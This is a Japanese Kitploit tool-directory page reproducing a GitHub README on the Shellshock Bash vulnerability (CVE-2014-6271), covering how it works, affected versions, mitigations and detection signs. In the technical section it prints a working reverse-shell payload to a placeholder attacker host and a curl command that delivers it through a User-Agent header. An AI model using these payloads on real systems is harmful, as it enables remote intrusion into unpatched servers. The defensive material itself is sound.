Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-6271 — CVE-2014-6271 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2014-6271
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPapers & ResearchLearning & Education
GitHub0xblackash/cve-2014-6271

CVE-2014-6271

CVE-2014-6271

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2014-6271 — “Shellshock”

shellshock

環境変数を介したGNU Bashにおける25年越しのゼロデイリモートコード実行

Severity CVSS Affected Patched


📖 概要

CVE-2014-6271、通称 Shellshock(別名 Bashdoor)は、GNU Bashシェルにおける重大なリモートコード実行(RCE) 脆弱性です。
攻撃者はHTTPヘッダー、DHCP、SSHなどを介して巧妙に細工された環境変数を送り込み、多くの場合認証なしかつ最小限のユーザー操作で、対象サーバーへのリモートシェルアクセスを獲得できます。


🧠 脆弱性サマリー

フィールド値
CVE IDCVE-2014-6271
深刻度🔴 Critical
CVSS10.0(最大)
攻撃ベクトルリモート(HTTP, DHCP, SSHなど)
認証の要否❌ 不要(多くのベクトル)
ユーザー操作❌ 不要(CGI/DHCPの場合)
影響サーバー完全制圧

⚙️ 技術的詳細

📨 ステップ1 — 悪意ある環境変数

攻撃者は細工された変数(例:User-Agentヘッダー内)を注入します:

root@kitploit:~
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1

🧩 ステップ2 — Bash関数解析の欠陥

Bashはペイロードを関数定義+後続コマンドとして誤って解釈します。変数が取り込まれた時点で();の後のコードが即座に実行されます。

💣 ステップ3 — リモート実行

コマンドはWebサーバー/プロセスの権限(多くの場合rootまたはwww-data)で実行されます。

結果:

root@kitploit:~
# リモートシェルアクセス成功
whoami
www-data

✅ 操作が成功した場合に正確に表示される内容(ステップバイステップ):

shellshock

1. ターミナル上(PoC実行直後)

root@kitploit:~
✅ Vulnerable! (Shellshock RCE triggered)
vulnerable
test

リバースシェルが即座に接続してくるのが確認できます。

2. 検出コマンドを実行したとき

root@kitploit:~
env x='() { :;}; echo vulnerable' bash -c "echo test"

直ちに以下の結果が返ります:

root@kitploit:~
vulnerable
test

(これによりBashが注入されたコマンドを実行したことが確認できます。)

3. RCE成功を示す本当の証拠 — ブラウザまたはcurlで確認(完全なRCEを手にした瞬間)

脆弱なApache CGIスクリプトに対して以下のcurlを実行します:

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://vulnerable-server/cgi-bin/test.sh

netcatリスナーには以下の出力が正確に表示されます:

root@kitploit:~
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...

この出力は直接リバースシェルに表示されます。エラーも404も発生しません。
これはサーバー上で完全なリモートコード実行が成立したことを意味します — 環境変数インジェクションが完全に機能したのです。


🎯 なぜ危険なのか

  • ⚡ 25年越しのゼロデイ(1989年から存在)
  • 🌐 極めて広い攻撃対象領域(CGI, DHCP, SSH, OpenVPN, CUPS…)
  • 🔓 最も一般的なベクトルでは認証不要
  • 🧨 完全なRCE能力
  • 📂 データ漏洩やランサムウェアの入口となり得る
  • 🔁 大規模ネットワークでのワーム化が可能

📦 影響を受けるバージョン

すべてのGNU Bashバージョン:

root@kitploit:~
1.14 〜 4.3(パッチレベル30未満)

(Linux, macOS, BSD, 組み込みデバイスを含む)


✅ パッチ適用済みバージョン

直ちに以下へアップグレード:

root@kitploit:~
Bash 4.3 パッチレベル30以降(4.4+推奨)

🛡️ 緩和策

1️⃣ 即時対応

  • 全システムでBashをアップデート:
    root@kitploit:~
    # Ubuntu/Debian
    apt update && apt install --only-upgrade bash
    
    # Red Hat/CentOS
    yum update bash
    

2️⃣ Webサーバーの強化

  • 可能な限りCGI/mod_cgiを無効化
  • () { をブロックするmod_securityルールを使用
  • 環境変数の受け渡しを制限

3️⃣ ログ監視

以下の兆候を監視:

  • () { を含む不審なUser-Agent / Referer
  • 予期しないリバースシェルや外部接続
  • WebサービスからのBash子プロセスの生成

🔍 検出のヒント

侵害指標(IoC)には以下が含まれます:

  • () { :;}; を含むログ
  • Webサーバーユーザーによって作成された予期しないファイル
  • 高ポート番号を使った外部接続
  • Webサーバーによる /bin/bash -i の生成

🧪 概念実証(概念)

root@kitploit:~
悪意あるヘッダー/DHCP/SSH → Bashが環境変数を取り込む
        ↓
関数定義+後続コマンドが実行される
        ↓
任意コマンド / リバースシェル

📌 関連脆弱性

この問題は複数の後続CVE(不完全な修正)を生み出しました:

  • CVE-2014-7169(AfterShock)
  • CVE-2014-6277 / CVE-2014-6278
  • CVE-2014-7186 / CVE-2014-7187

📊 影響評価

リスク領域影響
機密性🔴 高
完全性🔴 高
可用性🔴 高

🧩 得られた教訓

  • 環境変数は決して信用してはならない
  • シェルにおける関数解析は極めて厳格であるべき
  • コアシステムコンポーネントの長期間存続するバグは壊滅的
  • パッチ適用だけでは不十分 — 攻撃対象領域を強化せよ

📚 参考文献

  • NVD – CVE-2014-6271
  • Wikipedia – Shellshock
  • Red Hat Security Blog
  • Qualys Technical Analysis
  • CISA Alert TA14-268A

🚨 最終推奨

2026年においてもLinux/macOS/BSDサーバーを運用しているなら: 🔥 Bashに直ちにパッチを当てよ(エアギャップシステムでも)。 💡 パッチ未適用のBashがインターネットに露出している場合、侵害を前提とせよ。 🛡 完全なログレビューと整合性チェックを実施せよ。

ツールをダウンロード